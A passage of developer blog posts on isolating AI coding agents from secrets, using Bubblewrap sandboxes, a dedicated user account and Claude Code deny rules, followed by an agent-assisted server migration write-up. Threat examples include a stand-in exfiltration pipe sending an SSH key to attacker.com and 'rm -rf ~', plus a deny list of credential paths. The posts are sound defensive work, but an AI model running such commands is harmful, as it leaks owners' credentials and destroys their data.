The --unshare-pid flag creates a separate process namespace for the sandbox. When the AI looks at running processes, it sees only itself and the programs it started. Your browser, your email client, your other terminals—all invisible. This prevents the AI from sending signals to other programs or inspecting what they do.

The --die-with-parent flag sets a kill switch: if the parent process dies, the sandbox dies with it. No orphaned AI processes linger after you close your terminal.


The Network Question

Networks present the hardest choice.

An AI with network access can clone repositories, install packages, and fetch documentation. An AI without network access cannot do any of those things.

An AI with network access can also send files or other information to external servers. This represents a real risk when working with private codebases.

I chose to allow network access. Most programming tasks require it. But you should understand: anything the AI can read, the AI can theoretically transmit elsewhere.

A paranoid setup would disable networking entirely. You would pre-download all dependencies, clone all repositories ahead of time, and work offline. This approach works for high-security situations but breaks the normal development workflow.


What This Buys You

The sandbox prevents accidents and limits damage.

The AI cannot read your documents, photos, or browser history—I never shared those folders. The AI cannot install system-wide packages or modify your shell configuration. The AI cannot see your password manager or read your email.

The AI operates in a controlled space: your project folder, plus the tools needed to work on it.


What This Does Not Buy You

The sandbox does not prevent a determined attack through the network. If the AI decided to exfiltrate your code, network access makes that possible.

The sandbox does not prevent damage to your project folder. The AI has full write access there—it can delete everything.

Security involves tradeoffs. I have tried to balance usability and protection. A tighter sandbox would be safer but harder to use during experimentation & rapid development.

This configuration is useful for everyday development work: protected against casual mistakes, but potentially vulnerable to sophisticated attacks. For most scrappy programming tasks, this balance should be sufficient.


Testing Your Sandbox

Before trusting your sandbox, verify it works. These commands let you poke at the walls and confirm they hold.

Test 1: Confirm your home directory contents are hidden

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "ls $HOME/.bashrc 2>&1; ls $HOME/Documents 2>&1"

Both commands should fail with “No such file or directory”. Note that ls $HOME itself may show a partial directory structure (like Development) because Bubblewrap creates the path hierarchy needed to reach your bound $PWD. But the actual contents of your home folder—config files, documents, other projects—remain invisible.

Test 2: Confirm you cannot write to read-only paths

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "echo 'test' >> $HOME/.gitconfig"

This should fail with “Read-only file system”. The sandbox prevents writes to paths mounted with --ro-bind.

Test 3: Confirm you CAN write to the working directory

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "touch sandbox-test-file && rm sandbox-test-file && echo 'Write access confirmed'"

This should print “Write access confirmed”. The sandbox allows writes to paths mounted with --bind.

Test 4: Confirm process isolation

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --unshare-pid \
  --chdir "$PWD" \
  /bin/ps aux

This should show only a few processes (ps itself and its parent). Your browser, terminal, and other applications stay hidden.

Test 5: Confirm /tmp isolation

Run this in one terminal:

echo "secret from host" > /tmp/host-secret.txt

Then run this in the sandbox:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/cat /tmp/host-secret.txt

This should fail with “No such file or directory”. The sandbox has its own empty /tmp and cannot see files in the host’s /tmp.

Test 6: Confirm SSH agent works but keys are hidden

First, verify you have a key loaded in your agent:

ssh-add -l

This should list your key. Now test that the sandbox can use the agent but cannot read the key file:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname $SSH_AUTH_SOCK)" "$(dirname $SSH_AUTH_SOCK)" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --chdir "$PWD" \
  /bin/sh -c "ssh-add -l && cat ~/.ssh/id_ed25519"

The first command (ssh-add -l) should succeed and list your keys. The second command (cat ~/.ssh/id_ed25519) should fail with “No such file or directory”. The sandbox can use your SSH identity through the agent, but cannot read the private key file itself.


If all six tests pass, your sandbox walls are solid. The AI operates in the space you defined—no more, no less. Again- you can just git clone these tests from https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests.

Happy hacking!

A better way to limit Claude Code (and other coding agents!) access to Secrets

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed the creation of a dedicated user account & standard unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide- I found a better approach and I wanted to share.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account. Bubblewrap delivers a sweet spot combination of control AND flexibility that enables experimentation.

What Changed Since My Last Post

Immediately after publishing, I caught the flu. During three painful days in bed, I realized there are other, better approaches. Firejail would likely work well, but there’s another solution called Bubblewrap.

As I dug into Bubblewrap, I realized something else… Anthropic uses Bubblewrap!

But Anthropic embeds bubblewrap in their client. This implementation has a major disadvantage.

Embedding bubblewrap in the client means you have to trust the correctness and security of Anthropic’s implementation. They deserve credit for thinking about security, but this puzzles me. Why not publish guidance so users can secure themselves from Claude Code? Aren’t we going to need this for ALL agents? Isn’t this solution generalizable?

Defense-in-depth means we don’t rely on any single vendor to execute perfectly 100% of the time. Plus, this problem applies to all coding agents, not just Claude Code. I want an approach that doesn’t tie my security to Anthropic’s destiny.

The Security Problem We’re Solving

Before we dive into Bubblewrap, here’s what we’re protecting against:

  • You want to run a binary that will execute under your account’s permissions
  • Your account has access to sensitive files unrelated to the project you’re working on
  • You want your binary to invoke other standard system tools like ls, ps aux, or less
  • We want to invoke this binary while easily preventing it from accessing sensitive files unrelated to the binary’s activities

What if Claude Code has a bug? What happens if the bug is exploited, and bubblewrap constraints embedded within the client are not activated? Will Claude Code run rm -rf ~ or cat ~/.ssh/id_rsa | curl attacker.com?

Without your own wrapping of the agent, you’re at risk. When you wrap your coding agent calls with Bubblewrap, the kernel itself blocks the agent’s access to anything outside the jail you define.

What Is Bubblewrap?

Bubblewrap lets you run untrusted or semi-trusted code without risking your host system. We’re not trying to build a reproducible deployment artifact. We’re creating a jail where coding agents can work on your project while being unable to touch  ~/.aws, your browser profiles, your ~/Photos library or anything else sensitive.

Let’s explore Bubblewrap through the command line:

# Install it (Debian/Ubuntu)
sudo apt install bubblewrap

# Simplest possible sandbox - just isolate the filesystem view
bwrap --ro-bind /usr /usr --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
      --symlink usr/bin /bin --proc /proc --dev /dev \
      --unshare-all --die-with-parent \
      /bin/bash

# Inside the sandbox, try:
ls /home          # Empty or nonexistent
ls /etc           # Empty or nonexistent  
whoami            # Shows "nobody" or your mapped user
ping google.com   # Fails - no network

How This Command Works

This command creates a minimal sandboxed environment. Here’s what each part does:

Filesystem access:

  • --ro-bind /usr /usr mounts your system’s /usr directory as read-only inside the sandbox
  • The --symlink commands create shortcuts so programs can find libraries and binaries in expected locations
  • --proc /proc and --dev /dev give minimal access to system processes and devices

Isolation:

  • --unshare-all disconnects the sandbox from all system resources (network, shared memory, mount points, etc.)
  • --die-with-parent kills the sandbox if your main terminal closes

The Result:

Bash runs inside a stripped-down environment. It can execute programs from /usr but can’t see your home directory, config files, or access the network. Programs work, but they’re operating in a ghost town version of your filesystem.

Why Bubblewrap Beats Docker

This beats Docker for quick workflows. Docker requires a running daemon and lots of configuration files. Bubblewrap lets you execute your app directly—no daemon, no stale containers cluttering your system.

If you’re experienced enough to worry about Docker misconfigurations, Bubblewrap gives you more control when you need it. You just run a command. No YAML files or debugging background services.

Quick Start: Running Claude Code with Bubblewrap

A big part of the reason for needing this is --dangerously-skip-permissions. There are times when it’s very useful to give an agent autonomy in designing, experimenting & implementing systems. Last week, I built a wifi access point that hosts a Quakeworld Server and vends web assembly quake clients. It’s an instant-lan party in a box. I did this unattended and it works. --dangerously-skip-permissions is very powerful- assuming you know how to aim it safely.

Here’s how I run Claude Code with --dangerously-skip-permissions inside a Bubblewrap sandbox:

PROJECT_DIR="$HOME/Development/YourProject"
bwrap \
     --ro-bind /usr /usr \
     --ro-bind /lib /lib \
     --ro-bind /lib64 /lib64 \
     --ro-bind /bin /bin \
     --ro-bind /etc/resolv.conf /etc/resolv.conf \
     --ro-bind /etc/hosts /etc/hosts \
     --ro-bind /etc/ssl /etc/ssl \
     --ro-bind /etc/passwd /etc/passwd \
     --ro-bind /etc/group /etc/group \
     --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
     --ro-bind "$HOME/.nvm" "$HOME/.nvm" \
     --bind "$PROJECT_DIR" "$PROJECT_DIR" \
     --bind "$HOME/.claude" "$HOME/.claude" \
     --tmpfs /tmp \
     --proc /proc \
     --dev /dev \
     --share-net \
     --unshare-pid \
     --die-with-parent \
     --chdir "$PROJECT_DIR" \
     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
     "$(command -v claude)" --dangerously-skip-permissions "Please review Planning/ReportingEnhancementPlan.md"

Key Configuration Lines:

# Required for Claude Code to work
--ro-bind "$HOME/.nvm" "$HOME/.nvm" \

# Claude stores auth here. Without this, you'll re-login every time
--bind "$HOME/.claude" "$HOME/.claude" \

# Only add if you understand why you need SSH access
# --ro-bind "$HOME/.ssh" "$HOME/.ssh" \

# Block access to your .env files by overlaying them with empty files
# (you need to know the exact paths of the files)

     --ro-bind /dev/null "$PROJECT_DIR/.env" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.local" \
     --ro-bind /dev/null "$PROJECT_DIR/.env.production" \
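If you swap the final claude line for /bin/sh and poke around inside the sandbox, you can confirm the overlay works: each .env resolves to /dev/null, so reads come back empty:

# Inside the sandbox, the overlaid .env reads as an empty file
cat "$PROJECT_DIR/.env"        # prints nothing
wc -c < "$PROJECT_DIR/.env"    # 0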

Important: Most people don’t need the SSH line. It gives your agent the ability to SSH into systems where you’ve copied a public key. If you don’t understand the utility, don’t add it.

Why Not a Dedicated User Account?

My previous post proposed creating a custom user account for Claude on the host OS. This approach has three major problems:

1. ACL Tuning Becomes a Usability Nightmare

You’ll fight with file permissions constantly. You need to tune Access Control Lists to prevent access to sensitive .env files. This type of friction has killed security initiatives for decades. Security dies on usability hills.

I came up with that approach while getting sick with the flu. Please accept my apologies.

2. No Network Connectivity Restrictions

A custom account doesn’t solve the network access problem. Claude agents can spin up sockets and connect to whatever they want. Unless you run UFW and restrict outbound connectivity from your host, you risk your agent exfiltrating content.

I’ve been creating agents that remotely administer and tune servers. It’s not responsible to let agents have source:any destination:any access to your network or the Internet. One wrong prompt puts you at risk of data exfiltration. My previous solution was incomplete.

3. Docker Is the Wrong Tool

Docker solves the “it works on my machine” problem when moving code from your laptop to production servers. But most people aren’t deploying frequently enough to maintain strong Docker skills.

Setting up filesystems and networking in containers takes mental effort. If you just want to run a command safely, you shouldn’t need to install and configure a background service. People want something that works quickly without the cognitive overhead.

Why Use Your Own Bubblewrap Instead of Anthropic’s Sandbox?

Everyone makes security mistakes eventually. Claude Code is potentially dangerous. Which approach is safer?

Trust Anthropic: Hope their team never makes an implementation mistake that breaks security controls.

or

Don’t Trust Anthropic: Implement your own access controls in the operating system that constrain the binary at runtime.

There is one other big reason you should know how to leverage Bubblewrap. You need a solution for sandboxing agents that aren’t Claude Code.

Agents should never be considered trustworthy. Even when they have security controls. Put controls around them—don’t rely on agents built with models that have experienced misalignment.

A comparison of what you’re trusting with user-wrapped invocation of bubblewrap versus embedded bubblewrap in a client

Running Bubblewrap Yourself:

  • The Linux kernel’s namespace implementation
  • The Bubblewrap binary (small, auditable codebase)
  • Your own configuration (you wrote it, you understand it)
  • Your own proxy/filtering code

Using Anthropic’s Sandbox Runtime:

  • Everything above, plus:
  • Anthropic’s wrapper code and configuration choices
  • Anthropic’s filtering proxy implementation
  • Anthropic’s update/distribution mechanism (npm)
  • That Anthropic’s security interests align with yours

The Trust Matrix

Trust isn’t binary—it’s about understanding what you’re trusting and why. Here’s a quick comparison:

Threat                                 DIY bwrap              Anthropic SRT
Claude accidentally rm -rf ~           ✓ Protected            ✓ Protected
Claude exfiltrating ~/.ssh             ✓ Protected            ✓ Protected
Supply chain attack via npm            ✓ Not exposed          ✗ Exposed
Subtle misconfiguration                ✗ Your risk            ✓ Their expertise
Agent telemetry you don’t want sent    ✓ You control          ? Their choice
Novel bypass techniques                ✗ You’re on your own   ✓ Their team watches

So in Anthropic’s defense: this is not cut-and-dried. Most companies don’t have resources for great security teams. You have to decide whether you can own this. Many companies will be wise to rely on Anthropic’s expertise. Their reputation is on the line if someone breaks their sandbox implementation. But you’re going to be locked into Anthropic’s security model if you don’t learn how to wield bubblewrap. Pivoting to a new agent will require figuring out security there. Why not just rip the band aid off and learn bubblewrap?

Don’t trust me either!

This has been a fun writeup on trusting trust. TRUST ME!

But you shouldn’t trust me! I might be a Dog on the Internet. Maybe I’m ai slop?!

Here is some code you can use to test the bwrap container I provided for my claude usage. Note that this is invoked differently: we’re not going to call claude- we’re going to call bash and pass it the test script. My test script is available here:

All you need to do is create a YourProject folder in your $HOME/Development directory. Then create a sandbox-escape-test.sh in there. Fill it with the test code from my github.

Read and understand what the script does before executing it. This post is already pretty long 😀

Wrapping Up

I’m building with many agents—not just Claude Code. I need a generalized solution for sandboxing that I can apply to other agents.

Anthropic deserves attention and credit for the constraints they’re giving you. I wish they had published them in a way that doesn’t tie your security destiny to their ability to execute correctly 100% of the time.

The choice is yours: trust a vendor’s implementation, or take control of your own security boundaries. Both are valid. I might be paranoid. Are you feeling lucky?

p.s. If I ever get run over by a flaming pizza truck, here’s a handy one-liner:

claude "Act as a security expert with a specialization in Linux system security.  Help me generate a bubblewrap script for safely invoking coding agents so they do not have access to sensitive data on my file system and appropriately manage other security risks, even though they're going to be invoked under my account's permissions.  Let's talk through everything that the agent should be able to do & access first, and then generate an appropriate bwrap script for delivering that capability.  Then let's discuss what access we should restrict."

Need help on topics related to this? I’m currently freelance! Let’s connect and build secure things at incredibly high speed:

https://www.linkedin.com/in/patrickmccanna

Keeping secrets from Claude Code

How to keep your .env files safe from AI coding assistants

UPDATE: This post blew up! But I discovered a FAR SUPERIOR approach. You still might like this! But bubblewrap is faster and more flexible.

https://patrickmccanna.net/a-better-way-to-limit-claude-code-and-other-coding-agents-access-to-secrets/


Someone posted online:

“I like how Claude Code casually reads my .env file.”

This is an accurate assessment of Claude Code. Claude Code reads .env files by default. It loads your API keys, database passwords and tokens into memory without asking.

Is this unappealing to you? Here’s how to manage that risk.

The Problem

Claude Code can read .env files automatically. If you run it without --dangerously-skip-permissions, it’ll normally ask permission for access. But what if claude stops acting normally?

Should the secrecy of your file rely on a system that prevents access to your file till you just type in the phrase ‘yes’?

How is it possible that claude code can’t access the file sometimes, and other times it can?

It’s possible because you’re logged in and running claude under your user account. Claude has all the permissions it needs to masquerade as you! Claude always had access to the file! It’s just being polite. The politeness of LLMs cannot be relied upon. When you run claude this way, any file accessible by you is accessible by claude.

Claude Code is not supposed to break out of the current working directory. But what technical constraints prevent it? If you run claude under your account, there’s no Linux/macOS control that prevents it from getting at the photos/docs you have access to.

You’re trusting Claude to be polite and behave the way you expect.

If you invoke Claude (or any coding agent) under your user account, you’re trusting trust. Don’t despair! Here’s how to run Claude when you’re working on systems that demand safety.

The First Defense: A Separate User

Give Claude its own identity. Create the ‘Claude’ Group and User accounts.

On Linux:

# Create a group for Claude
sudo groupadd claude

# Create a user with no home directory privileges beyond basics
sudo useradd -m -g claude -s /bin/bash claude

# Set a password (you’ll need it for sudo later)
sudo passwd claude

On macOS:

# Create a group (find an unused GID first)
sudo dscl . -create /Groups/claude
sudo dscl . -create /Groups/claude PrimaryGroupID 400

# Create the user
sudo dscl . -create /Users/claude
sudo dscl . -create /Users/claude PrimaryGroupID 400
sudo dscl . -create /Users/claude UserShell /bin/bash
sudo dscl . -create /Users/claude NFSHomeDirectory /Users/claude
sudo dscl . -create /Users/claude UniqueID 400

# Create home directory and set ownership
sudo mkdir -p /Users/claude
sudo chown claude:claude /Users/claude

# Set password
sudo passwd claude

The claude user now exists. Run claude as its own user and keep the secrets files outside the permissions of the claude user.

Lock Down Your .env Files

Your secrets need permissions that exclude the claude user.

# Navigate to your project
cd /path/to/your/project

# Set ownership to yourself
chown $(whoami):$(whoami) .env

# Lock Down Your .env Files
# Remove all permissions for others
# Owner can read and write.
# Group and others get nothing

chmod 600 .env

The 600 permission means only you can read the file. The claude user belongs to a different group.
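You can verify the denial directly before ever launching the agent (the path is your project’s):

# Should fail with "Permission denied" once ownership and mode are set
sudo -u claude cat /path/to/your/project/.env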

For extra certainty, explicitly deny the claude group:

# make sure .env is owned by your primary group

chown $(whoami):$(id -gn) .env
chmod 640 .env

Verify your work:

ls -la .env

You should see something like -rw------- or -rw-r-----. The important part: no permissions on the right side for “others.”

Run Claude under the Claude user account

Become claude! Claude now runs with the claude user’s permissions. Your secrets remain invisible to the claude user because you’ve ACL’d away access to the .env file.

# Switch to claude user and run Claude Code

sudo -u claude claude

That’s it. sudo -u claude runs the command that follows as the claude user. Claude Code launches. If it tries to read your .env file, it’ll get a permissions denied error it can’t overcome.

For convenience, create an alias:

# Add to your .bashrc or .zshrc
alias claudecode='sudo -u claude claude'

Now you type claudecode and everything’s safe.

Summarizing:

# One-time setup (Linux)
sudo groupadd claude
sudo useradd -m -g claude -s /bin/bash claude
sudo passwd claude

# Per-project setup
cd /your/project
chown $(whoami):$(whoami) .env
chmod 600 .env

# Daily usage
sudo -u claude claude

  • Create a dedicated user for claude
  • Set file permissions that exclude the claude user from access to sensitive files
  • Invoke claude with sudo -u claude. let the OS enforce boundaries

The claude user can read your source code. It can write to project directories if you grant that access. But it cannot touch files owned by you with restrictive permissions. The operating system enforces this.

In the next section, I’ll summarize Anthropic’s stated controls. When you go this route, you’re trusting Anthropic to not only respect your wishes, but to write code so secure that it always and only does what they intend. All software has mistakes, even Anthropic’s. Buyer beware.

I include this next section out of respect for Anthropic- but my judgement is that using the following approach will eventually bite you in the butt.


The Second Defense: Deny Rules

Claude has mechanisms for restricting access. You’re trusting Anthropic to do the right thing correctly all the time. Anthropic has published mechanisms for telling Claude Code what it cannot touch. Do this before you write your first line of code. The configuration lives in ~/.claude/settings.json.

Create the file. Add these rules:

{ "permissions": 
    { "deny": [ 
        "Read(**/.env*)", 
        "Read(**/secrets/**)", 
        "Read(**/*credentials*)", 
        "Read(**/*secret*)", 
        "Read(~/.ssh/**)", 
        "Read(~/.aws/**)", 
        "Read(~/.kube/**)" ] 
    } }

The double asterisks catch nested directories. They catch the .env.local file you forgot you had.

Test your rules. Ask Claude Code to read your .env file. It should fail. If it reads the file anyway, something is wrong. Fix it before you continue.

The Anthropic access controls are like putting a lock on your door. It keeps honest people honest. Locks can be picked. AI assistants can be influenced into circumventing their own controls.


An alternative approach: Containers

Containers are an approach for protecting secrets.

Run Claude Code inside a Docker container or a virtual machine. Give it access only to what it needs. The container is a sandbox the AI plays within. Your secrets stay outside the container. Make claude build the thing- it can have its own internal .env files- but for prod, you change your secrets.

Configure your container with read-only volumes for code. Mount nothing sensitive.

The AI agent can see project files in your container. It cannot see your home directory. It cannot see your SSH keys. It can’t probe through the Photos library in your home directory.

This approach follows the principle of least privilege. Grant minimum access required. Assume the worst.
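A minimal sketch of that shape, with a hypothetical image and paths (mount the code read-only, keep everything else out):

# Project source mounted read-only; no $HOME, no SSH keys, no real .env
docker run --rm -it \
  -v "$PWD/src:/work/src:ro" \
  -w /work \
  node:20-bookworm /bin/bash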

My advice: Use operating system permissions, user accounts and groups

Leveraging operating system access controls is defense in depth. Deny rules can be misconfigured. Vault integrations can fail. But Unix permissions have guarded secrets for a long time. You have to decide which risk is more probable: kernel exploits that circumvent ACLs, or prompt engineering that pushes the agent to access secrets. I’m going to put my resources into ACLs and good OS hygiene. These approaches don’t get distracted by clever prompts.

The Truth About AI Security

There is no going back. Claude is insanely useful. Coding agents write code faster than you can. They explain concepts clearly.

Coding agents are also prone to probabilistic outbursts. If you need to keep secrets, use deterministic/idempotent operating system access controls for preventing access.

Using custom AI Agents to Migrate Self-Hosted Services Between Servers

Migrations are hard.

I ran into an infrastructure challenge during my IoT development. A Raspberry Pi 5 (kbr server) ran three self-hosted services—Planka (Kanban boards), Ghost (blog), and Homer (dashboard). I needed to migrate them to a more powerful server running AMD Ryzen hardware. This would free my dev box up to experiment with new features in my Kanban/Blog/Reporting (KBR) tool.

The server I want to migrate to is already hosting critical AI services (Ollama, Open WebUI, and n8n). I do not want them disrupted during the migration.

Both systems used Cloudflare Tunnels for secure external access, Docker for containerization. They each had existing Ansible playbooks for deployment and backup. I wanted to:

  • Fully migrate production services from a Pi to the new server
  • Preserve all data (posts, drafts, images, kanban cards, attachments)
  • Keep existing AI services running untouched
  • Convert the old Pi into a development environment
  • Execute a clean DNS cutover with minimal downtime

The big problem is the limitations of my own brain. As I’ve been doing more AI supported development, the pace of my achievements is making it hard for me to maintain awareness of how everything is configured. I built this system months ago. My memory of how to backup and rebuild everything has faded. I had playbooks for building, but migrating existing data to a new deployment is a different beast.

Discovery Phase: Understanding Both Systems

I needed to deeply understand both systems to build a migration plan. I overcame my gaps in memory about how everything works by creating & using automated exploration agents to gather comprehensive information about each system’s architecture and deployed software.

For this project, the general design of my agents included:

  • an objective,
  • 7 phases of migration activities
  • Clear expressions around safety, best practices & defined success conditions

My Agents have the following set of objectives:

You are a system analysis agent. Your task is to:
1. Review historical knowledge from previous agents
2. Analyze the project codebase to understand the intended system architecture
3. Connect to the running deployment and gather actual system state
4. Compare expected vs actual state
5. Produce a structured summary for troubleshooting purposes
6. Update knowledge repositories with discoveries
7. Create an Operations.md file in the Operations directory of the project if it doesn't exist.  

At a top level, the phases include:

Phase 0: Knowledge Base Review
Phase 1: Repository Structure Analysis
Phase 2: Live System Discovery
Phase 3: Analysis & Comparison
Phase 4: Context Documentation & Knowledge Updates
Phase 5: Operations Documentation
Phase 6: Final Deliverable

The general gist of the above is:

First, the agent searches a knowledge base of previous agent troubleshooting sessions that captured problems that were discovered & corrected. This reduces redundant troubleshooting across sessions, and it helps manage my token budget for the work.

Next, the agent looks into the code that generates the project to understand what's supposed to be on the target system.

Then the agent inspects the live system to understand what's actually there (whether due to configuration drift or some other change).

When that's complete, the agent munges everything we have into an operations document. This becomes my operations report.

Source System (kbr server) Discovery

The exploration agent showed:

  • 6 containerized services: Planka, Ghost, Homer, PostgreSQL, MySQL, and Nginx
  • 7 Docker volumes requiring backup (database data, attachments, content, avatars, etc.)
  • Cloudflare tunnel routing traffic for kanban.url, blog.url, and reports.url
  • Existing Ansible playbooks for backup and restore operations
  • Well-documented architecture in markdown files

Target System (ai server) Discovery

The agent found that the server I want to migrate to had:

  • Existing protected services: Ollama (LLM inference), Open WebUI (chat interface), n8n (workflow automation)
  • A reserved ports list
  • A storage constraint: the /home partition was at 75% capacity, so new services had to go in /opt/
  • Available resources: 650GB disk space in /opt/, 25GB+ RAM available
  • An active Cloudflare tunnel for my AI endpoint that had to stay untouched
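
The discovery work itself is mostly read-only shell commands run over SSH. Here is a sketch of the kinds of checks my exploration agents perform; the hostnames match the placeholder names used in the examples later in this post, not my real ones.

# What's running, and on which ports?
ssh account@ai.server "docker ps --format '{{.Names}}\t{{.Ports}}'"
ssh account@ai.server "ss -tlnp"

# Which volumes exist and would need backup?
ssh account@kbr.server "docker volume ls"

# Storage headroom on the target
ssh account@ai.server "df -h /home /opt"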

Validating Backup Procedures

I wanted to confirm that the deployed backup scripts followed official documentation. I've found that agents sometimes try to invent their own backup strategies; they can work, but they also break future updates. So I fetched the official backup guides for both Ghost and Planka, then had the agent compare them against the existing backup_kbr.sh script.

The existing backup script matched all requirements and exceeded them with additional safeguards like SHA256 checksums and comprehensive manifests.
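
That checksum safeguard is worth copying. A minimal sketch of the pattern (the filenames are illustrative, not lifted from backup_kbr.sh):

# At backup time: record a checksum for every archive
cd backups/
sha256sum *.tar.gz > manifest.sha256

# At restore time: refuse to proceed unless every file verifies
sha256sum -c manifest.sha256 || exit 1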

Planning Phase: Building a 10-Phase Migration Plan

I built a comprehensive migration plan through iterative review with the agent. I discussed, refined, and enhanced each phase based on operational concerns.

The 10 Phases

 1. Pre-Migration Preparation: Verify prerequisites, create rollback points
 2. Data Quality Assessment: Generate backup, verify integrity, record baseline counts
 3. Prepare ai server: Create directory structure, Docker Compose stack
 4. Data Transfer: rsync backup to target, restore databases and volumes
 5. Testing (QA/QC): Local testing, data verification, create Ghost API key
 6. Staging DNS: Add temporary *bak DNS names to ai server tunnel
 7. Staging Validation: External testing, write tests, Go/No-Go checkpoint
 8. Reconfigure kbr server: Convert to dev environment with *-dev DNS names
 9. DNS Cutover: Switch production names to ai server
10. Cleanup: Remove staging DNS, update Homer links, set up monitoring

Key Planning Decisions

DNS Strategy: I implemented a staged approach:

  • Current: Production names on kbr server
  • Staging: Temporary *bak names on ai server for testing
  • Final: Production names transferred to ai server
  • Dev: New *-dev names on kbr server for experimentation
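
As a sketch of what the staging step looks like with Cloudflare Tunnels (the hostname and port here are placeholders, not my actual values), each staging name needs a DNS route through the existing ai server tunnel:

# Route a temporary staging hostname through the ai server tunnel
cloudflared tunnel route dns <tunnel-id> kanbanbak.myurl.io

plus a matching ingress rule in the tunnel's config.yml, added above the catch-all entry so the existing AI endpoints stay untouched:

ingress:
  - hostname: kanbanbak.myurl.io
    service: http://localhost:3015
  - service: http_status:404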

Port Allocation: The agent selected ports that don’t conflict with existing services.

Storage Location: The agent put all migration files in /opt/kbr-migration/ to avoid the space-constrained /home partition.

Enhancements I Added During Review

Through iterative discussion, I enhanced the plan with:

  • Health check loops instead of arbitrary sleep commands for database readiness (see the sketch after this list)
  • rsync with --progress instead of scp for large file transfers
  • Baseline counts table to verify I lost nothing (posts, drafts, images, cards, attachments)
  • Write tests to verify full functionality (create test post, create test card)
  • Go/No-Go checkpoints before major transitions
  • Rollback procedures with automatic restoration on failure
  • Ghost Content API key creation for the reporting dashboard
  • Homer URL updates since the migrated config still pointed to old URLs
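
The health check loops are the enhancement I'd highlight. The Postgres version appears in the execution section below; a MySQL equivalent for the Ghost database might look like this (the container name follows the kbr-planka-db pattern and is my assumption):

# Wait until MySQL actually accepts connections instead of sleeping a fixed time
until docker exec kbr-ghost-db mysqladmin ping -h localhost --silent; do
  sleep 2
done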

Executing the Plan

Prerequisites

Before I started execution:

  • Obtain a Cloudflare API token with DNS edit permissions for the domain
  • Verify SSH access to both servers
  • Confirm Docker runs on both systems
  • Check available disk space in /opt/ on ai server

Execution Flow

Phases 1-2: Safe, Read-Only Operations

These phases don’t modify any running services. They create backups, verify data integrity, and establish baseline measurements. If anything looks wrong, I stop here—no harm done.

# Run the backup
cd /home/Development/Playbooks/SelfHosted_K_B_R
ansible-playbook -i inventory backup.yml

# Record baseline counts for later comparison
ssh account@kbr.server
docker exec ghost-db mysql -u ghost -p... ghost \
  -e "SELECT status, COUNT(*) FROM posts GROUP BY status;"

Phases 3-5: Target System Setup

I create the Docker infrastructure on ai server and restore the backup. I test locally before any DNS changes.

# Create directory structure
sudo mkdir -p /opt/kbr-migration
sudo chown account:account /opt/kbr-migration

# Transfer and extract backup
rsync -avh --progress backups/*.tar.gz account@ai.server:/opt/kbr-migration/

# Start databases with health checks
docker-compose up -d planka-db ghost-db
until docker exec kbr-planka-db pg_isready -U planka; do sleep 2; done

# Restore data
zcat databases/planka_db.sql.gz | docker exec -i kbr-planka-db psql -U planka -d planka
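
The Ghost restore follows the same pattern on the MySQL side. A sketch, assuming the dump and container names mirror the Planka ones (I'm guessing at the parallel naming here, and the password is elided as above):

# Restore the Ghost MySQL database
zcat databases/ghost_db.sql.gz | docker exec -i kbr-ghost-db mysql -u ghost -p... ghost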

Phases 6-7: Staging Validation

I add temporary DNS names and test externally. This is the last safe checkpoint—production still runs on kbr server.

The Go/No-Go checkpoint requires all tests to pass:

  • All staging URLs accessible
  • Images and drafts verified
  • Test post/card creation works
  • Existing ai domain endpoint still functional
  • Baseline counts match
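
A sketch of the external URL check, using hypothetical staging hostnames that follow the *bak convention:

# Fail loudly if any staging URL doesn't return HTTP 200
for url in kanbanbak.myurl.io blogbak.myurl.io reportsbak.myurl.io; do
  code=$(curl -s -o /dev/null -w '%{http_code}' "https://$url")
  [ "$code" = "200" ] && echo "OK   $url" || echo "FAIL $url ($code)"
done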

Phases 8-9: The Cutover

This is where production switches. A brief window of unavailability exists between reconfiguring the kbr server and completing the DNS cutover on the ai server.

# On kbr server: Switch to dev names
# On ai server: Add production names to tunnel
cloudflared tunnel route dns <tunnel-id> kanban.myurl.io
cloudflared tunnel route dns <tunnel-id> blog.myurl.io
cloudflared tunnel route dns <tunnel-id> reports.myurl.io

Phase 10: Cleanup

I remove temporary staging DNS entries, update Homer dashboard links to point to production URLs, and set up automated backups and health monitoring.
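
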